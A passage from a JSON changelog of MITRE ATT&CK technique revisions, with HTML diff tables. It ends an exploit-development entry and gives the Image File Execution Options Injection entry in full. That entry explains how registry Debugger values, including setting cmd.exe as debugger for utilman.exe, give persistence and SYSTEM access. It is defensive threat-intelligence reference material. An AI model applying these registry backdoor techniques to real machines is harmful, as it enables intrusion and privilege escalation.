class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;in&nbsp;order&nbsp;to&nbsp;cause&nbsp;unintended&nbsp;or&nbsp;unanticipated&nbsp;behavior&nbsp;to&nbsp;o</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;in&nbsp;order&nbsp;to&nbsp;cause&nbsp;unintended&nbsp;or&nbsp;unanticipated&nbsp;behavior&nbsp;to&nbsp;o</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ccur&nbsp;on&nbsp;computer&nbsp;hardware&nbsp;or&nbsp;software.&nbsp;Rather&nbsp;than&nbsp;finding/m</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ccur&nbsp;on&nbsp;computer&nbsp;hardware&nbsp;or&nbsp;software.&nbsp;Rather&nbsp;than&nbsp;finding/m</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">odifying&nbsp;exploits&nbsp;from&nbsp;online&nbsp;or&nbsp;purchasing&nbsp;them&nbsp;from&nbsp;exploi</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">odifying&nbsp;exploits&nbsp;from&nbsp;online&nbsp;or&nbsp;purchasing&nbsp;them&nbsp;from&nbsp;exploi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">t&nbsp;vendors,&nbsp;an&nbsp;adversary&nbsp;may&nbsp;develop&nbsp;their&nbsp;own&nbsp;exploits.(Cita</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">t&nbsp;vendors,&nbsp;an&nbsp;adversary&nbsp;may&nbsp;develop&nbsp;their&nbsp;own&nbsp;exploits.(Cita</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tion:&nbsp;NYTStuxnet)&nbsp;Adversaries&nbsp;may&nbsp;use&nbsp;information&nbsp;acquired&nbsp;v</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tion:&nbsp;NYTStuxnet)&nbsp;Adversaries&nbsp;may&nbsp;use&nbsp;information&nbsp;acquired&nbsp;v</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ia&nbsp;[Vulnerabilities](https://attack.mitre.org/techniques/T15</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ia&nbsp;[Vulnerabilities](https://attack.mitre.org/techniques/T15</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">88/006)&nbsp;to&nbsp;focus&nbsp;exploit&nbsp;development&nbsp;efforts.&nbsp;As&nbsp;part&nbsp;of&nbsp;the</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">88/006)&nbsp;to&nbsp;focus&nbsp;exploit&nbsp;development&nbsp;efforts.&nbsp;As&nbsp;part&nbsp;of&nbsp;the</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;exploit&nbsp;development&nbsp;process,&nbsp;adversaries&nbsp;may&nbsp;uncover&nbsp;exploi</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;exploit&nbsp;development&nbsp;process,&nbsp;adversaries&nbsp;may&nbsp;uncover&nbsp;exploi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">table&nbsp;vulnerabilities&nbsp;through&nbsp;methods&nbsp;such&nbsp;as&nbsp;fuzzing&nbsp;and&nbsp;pa</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">table&nbsp;vulnerabilities&nbsp;through&nbsp;methods&nbsp;such&nbsp;as&nbsp;fuzzing&nbsp;and&nbsp;pa</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tch&nbsp;analysis.(Citation:&nbsp;Irongeek&nbsp;Sims&nbsp;BSides&nbsp;2017)&nbsp;&nbsp;As&nbsp;with&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tch&nbsp;analysis.(Citation:&nbsp;Irongeek&nbsp;Sims&nbsp;BSides&nbsp;2017)&nbsp;&nbsp;As&nbsp;with&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">legitimate&nbsp;development&nbsp;efforts,&nbsp;different&nbsp;skill&nbsp;sets&nbsp;may&nbsp;be&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">legitimate&nbsp;development&nbsp;efforts,&nbsp;different&nbsp;skill&nbsp;sets&nbsp;may&nbsp;be&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">required&nbsp;for&nbsp;developing&nbsp;exploits.&nbsp;The&nbsp;skills&nbsp;needed&nbsp;may&nbsp;be&nbsp;l</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">required&nbsp;for&nbsp;developing&nbsp;exploits.&nbsp;The&nbsp;skills&nbsp;needed&nbsp;may&nbsp;be&nbsp;l</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ocated&nbsp;in-house,&nbsp;or&nbsp;may&nbsp;need&nbsp;to&nbsp;be&nbsp;contracted&nbsp;out.&nbsp;Use&nbsp;of&nbsp;a&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ocated&nbsp;in-house,&nbsp;or&nbsp;may&nbsp;need&nbsp;to&nbsp;be&nbsp;contracted&nbsp;out.&nbsp;Use&nbsp;of&nbsp;a&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">contractor&nbsp;may&nbsp;be&nbsp;considered&nbsp;an&nbsp;extension&nbsp;of&nbsp;that&nbsp;adversary'</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">contractor&nbsp;may&nbsp;be&nbsp;considered&nbsp;an&nbsp;extension&nbsp;of&nbsp;that&nbsp;adversary'</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;exploit&nbsp;development&nbsp;capabilities,&nbsp;provided&nbsp;the&nbsp;adversary&nbsp;p</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;exploit&nbsp;development&nbsp;capabilities,&nbsp;provided&nbsp;the&nbsp;adversary&nbsp;p</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">lays&nbsp;a&nbsp;role&nbsp;in&nbsp;shaping&nbsp;requirements&nbsp;and&nbsp;maintains&nbsp;an&nbsp;initial</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">lays&nbsp;a&nbsp;role&nbsp;in&nbsp;shaping&nbsp;requirements&nbsp;and&nbsp;maintains&nbsp;an&nbsp;initial</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;degree&nbsp;of&nbsp;exclusivity&nbsp;to&nbsp;the&nbsp;exploit.&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;use&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;degree&nbsp;of&nbsp;exclusivity&nbsp;to&nbsp;the&nbsp;exploit.&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;use&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">exploits&nbsp;during&nbsp;various&nbsp;phases&nbsp;of&nbsp;the&nbsp;adversary&nbsp;lifecycle&nbsp;(i</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">exploits&nbsp;during&nbsp;various&nbsp;phases&nbsp;of&nbsp;the&nbsp;adversary&nbsp;lifecycle&nbsp;(i</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">.e.&nbsp;[Exploit&nbsp;Public-Facing&nbsp;Application](https://attack.mitre</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">.e.&nbsp;[Exploit&nbsp;Public-Facing&nbsp;Application](https://attack.mitre</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">.org/techniques/T1190),&nbsp;[Exploitation&nbsp;for&nbsp;Client&nbsp;Execution](</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">.org/techniques/T1190),&nbsp;[Exploitation&nbsp;for&nbsp;Client&nbsp;Execution](</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">https://attack.mitre.org/techniques/T1203),&nbsp;[Exploitation&nbsp;fo</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">https://attack.mitre.org/techniques/T1203),&nbsp;[Exploitation&nbsp;fo</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">r&nbsp;Privilege&nbsp;Escalation](https://attack.mitre.org/techniques/</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">r&nbsp;Privilege&nbsp;Escalation](https://attack.mitre.org/techniques/</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">T1068),&nbsp;[Exploitation&nbsp;for&nbsp;<span class=\"diff_chg\">Defense&nbsp;Evasion</span>](https://attack.mi</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">T1068),&nbsp;[Exploitation&nbsp;for&nbsp;<span class=\"diff_chg\">Stealth</span>](https://attack.mitre.org/</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tre.org/techniques/T1211),&nbsp;[Exploitation&nbsp;for&nbsp;Credential&nbsp;Acce</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">techniques/T1211),&nbsp;[Exploitation&nbsp;for&nbsp;Credential&nbsp;Access](http</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ss](https://attack.mitre.org/techniques/T1212),&nbsp;[Exploitatio</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s://attack.mitre.org/techniques/T1212),&nbsp;[Exploitation&nbsp;of&nbsp;Rem</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n&nbsp;of&nbsp;Remote&nbsp;Services](https://attack.mitre.org/techniques/T1</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ote&nbsp;Services](https://attack.mitre.org/techniques/T1210),&nbsp;an</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">210),&nbsp;and&nbsp;[Application&nbsp;or&nbsp;System&nbsp;Exploitation](https://attac</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">d&nbsp;[Application&nbsp;or&nbsp;System&nbsp;Exploitation](https://attack.mitre.</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">k.mitre.org/techniques/T1499/004)).</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">org/techniques/T1499/004)).</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1056: Pre-compromise"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0894: Detection of Exploits"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--6d4a7fb3-5a24-42be-ae61-6728a2b581f6",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-24 15:05:58.384000+00:00",
                    "modified": "2026-04-16 18:54:42.949000+00:00",
                    "name": "Image File Execution Options Injection",
                    "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application\u2019s IFEO will be prepended to the application\u2019s name, effectively launching the new process under the debugger (e.g., <code>C:\\dbg\\ntsd.exe -g  notepad.exe</code>).(Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nIFEOs can be set directly via the Registry or in Global Flags via the GFlags tool.(Citation: Microsoft GFlags Mar 2017) IFEOs are represented as <code>Debugger</code> values in the Registry under <code>HKLM\\SOFTWARE{\\Wow6432Node}\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\<executable></code> where <code>&lt;executable&gt;</code> is the binary on which the debugger is attached.(Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nIFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process).(Citation: Microsoft Silent Process Exit NOV 2017)(Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\</code>.(Citation: Microsoft Silent Process Exit NOV 2017)(Citation: Oddvar Moe IFEO APR 2018)\n\nSimilar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures \"cmd.exe,\" or another program that provides backdoor access, as a \"debugger\" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the \"debugger\" program to be executed with SYSTEM privileges.(Citation: Tilbury 2014)\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer.(Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.\n\nMalware may also use IFEO to impair defenses by registering invalid debuggers that redirect and effectively disable various system and security applications.(Citation: FSecure Hupigon)(Citation: Symantec Ushedix June 2008)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "persistence"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1546/012",
                            "external_id": "T1546.012"
                        },
                        {
                            "source_name": "FSecure Hupigon",
                            "description": "FSecure. (n.d.). Backdoor - W32/Hupigon.EMV - Threat Description. Retrieved December 18, 2017.",
                            "url": "https://www.f-secure.com/v-descs/backdoor_w32_hupigon_emv.shtml"
                        },
                        {
                            "source_name": "Elastic Process Injection July 2017",
                            "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.",
                            "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"
                        },
                        {
                            "source_name": "Microsoft Silent Process Exit NOV 2017",
                            "description": "Marshall, D. & Griffin, S. (2017, November 28). Monitoring Silent Process Exit. Retrieved June 27, 2018.",
                            "url": "https://docs.microsoft.com/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit"
                        },
                        {
                            "source_name": "Microsoft GFlags Mar 2017",
                            "description": "Microsoft. (2017, May 23). GFlags Overview. Retrieved December 18, 2017.",
                            "url": "https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview"
                        },
                        {
                            "source_name": "Oddvar Moe IFEO APR 2018",
                            "description": "Moe, O. (2018, April 10). Persistence using GlobalFlags in Image File Execution Options - Hidden from Autoruns.exe. Retrieved June 27, 2018.",
                            "url": "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/"
                        },
                        {
                            "source_name": "Microsoft Dev Blog IFEO Mar 2010",
                            "description": "Shanbhag, M. (2010, March 24). Image File Execution Options (IFEO). Retrieved December 18, 2017.",
                            "url": "https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/"
                        },
                        {
                            "source_name": "Symantec Ushedix June 2008",
                            "description": "Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December 18, 2017.",
                            "url": "https://www.symantec.com/security_response/writeup.jsp?docid=2008-062807-2501-99&tabid=2"
                        },
                        {
                            "source_name": "Tilbury 2014",
                            "description": "Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. Retrieved November 17, 2024.",
                            "url": "https://web.archive.org/web/20200730053039/https://www.crowdstrike.com/blog/registry-analysis-with-crowdresponse/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Oddvar Moe, @oddvarmoe"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.2",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 18:54:42.949000+00:00\", \"old_value\": \"2025-10-24 17:48:55.526000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application\\u2019s IFEO will be prepended to the application\\u2019s name, effectively launching the new process under the debugger (e.g., <code>C:\\\\dbg\\\\ntsd.exe -g  notepad.exe</code>).(Citation: Microsoft Dev Blog IFEO Mar 2010)\\n\\nIFEOs can be set directly via the Registry or in Global Flags via the GFlags tool.(Citation: Microsoft GFlags Mar 2017) IFEOs are represented as <code>Debugger</code> values in the Registry under <code>HKLM\\\\SOFTWARE{\\\\Wow6432Node}\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\<executable></code> where <code>&lt;executable&gt;</code> is the binary on which the debugger is attached.(Citation: Microsoft Dev Blog IFEO Mar 2010)\\n\\nIFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process).(Citation: Microsoft Silent Process Exit NOV 2017)(Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in <code>HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\</code>.(Citation: Microsoft Silent Process Exit NOV 2017)(Citation: Oddvar Moe IFEO APR 2018)\\n\\nSimilar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures \\\"cmd.exe,\\\" or another program that provides backdoor access, as a \\\"debugger\\\" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the \\\"debugger\\\" program to be executed with SYSTEM privileges.(Citation: Tilbury 2014)\\n\\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer.(Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.\\n\\nMalware may also use IFEO to impair defenses by registering invalid debuggers that redirect and effectively disable various system and security applications.(Citation: FSecure Hupigon)(Citation: Symantec Ushedix June 2008)\", \"old_value\": \"Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application\\u2019s IFEO will be prepended to the application\\u2019s name, effectively launching the new process under the debugger (e.g., <code>C:\\\\dbg\\\\ntsd.exe -g  notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)\\n\\nIFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as <code>Debugger</code> values in the Registry under <code>HKLM\\\\SOFTWARE{\\\\Wow6432Node}\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\<executable></code> where <code>&lt;executable&gt;</code> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)\\n\\nIFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in <code>HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\</code>. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)\\n\\nSimilar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures \\\"cmd.exe,\\\" or another program that provides backdoor access, as a \\\"debugger\\\" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the \\\"debugger\\\" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)\\n\\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.\\n\\nMalware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)\", \"diff\": \"--- \\n+++ \\n@@ -1,11 +1,11 @@\\n-Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application\\u2019s IFEO will be prepended to the application\\u2019s name, effectively launching the new process under the debugger (e.g., <code>C:\\\\dbg\\\\ntsd.exe -g  notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)\\n+Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application\\u2019s IFEO will be prepended to the application\\u2019s name, effectively launching the new process under the debugger (e.g., <code>C:\\\\dbg\\\\ntsd.exe -g  notepad.exe</code>).(Citation: Microsoft Dev Blog IFEO Mar 2010)\\n \\n-IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as <code>Debugger</code> values in the Registry under <code>HKLM\\\\SOFTWARE{\\\\Wow6432Node}\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\<executable></code> where <code>&lt;executable&gt;</code> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)\\n+IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool.(Citation: Microsoft GFlags Mar 2017) IFEOs are represented as <code>Debugger</code> values in the Registry under <code>HKLM\\\\SOFTWARE{\\\\Wow6432Node}\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\<executable></code> where <code>&lt;executable&gt;</code> is the binary on which the debugger is attached.(Citation: Microsoft Dev Blog IFEO Mar 2010)\\n \\n-IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in <code>HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\</code>. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)\\n+IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process).(Citation: Microsoft Silent Process Exit NOV 2017)(Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in <code>HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\</code>.(Citation: Microsoft Silent Process Exit NOV 2017)(Citation: Oddvar Moe IFEO APR 2018)\\n \\n-Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures \\\"cmd.exe,\\\" or another program that provides backdoor access, as a \\\"debugger\\\" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the \\\"debugger\\\" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)\\n+Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures \\\"cmd.exe,\\\" or another program that provides backdoor access, as a \\\"debugger\\\" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the \\\"debugger\\\" program to be executed with SYSTEM privileges.(Citation: Tilbury 2014)\\n \\n-Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.\\n+Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer.(Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.\\n \\n-Malware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)\\n+Malware may also use IFEO to impair defenses by registering invalid debuggers that redirect and effectively disable various system and security applications.(Citation: FSecure Hupigon)(Citation: Symantec Ushedix June 2008)\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
                    "previous_version": "1.2",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to6__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to6__0\"><a href=\"#difflib_chg_to6__top\">t</a></td><td class=\"diff_header\" id=\"from6_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;establish&nbsp;persistence&nbsp;and/or&nbsp;elevate&nbsp;privile</td><td class=\"diff_next\"><a href=\"#difflib_chg_to6__top\">t</a></td><td class=\"diff_header\" id=\"to6_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;establish&nbsp;persistence&nbsp;and/or&nbsp;elevate&nbsp;privile</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ges&nbsp;by&nbsp;executing&nbsp;malicious&nbsp;content&nbsp;triggered&nbsp;by&nbsp;Image&nbsp;File&nbsp;E</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td 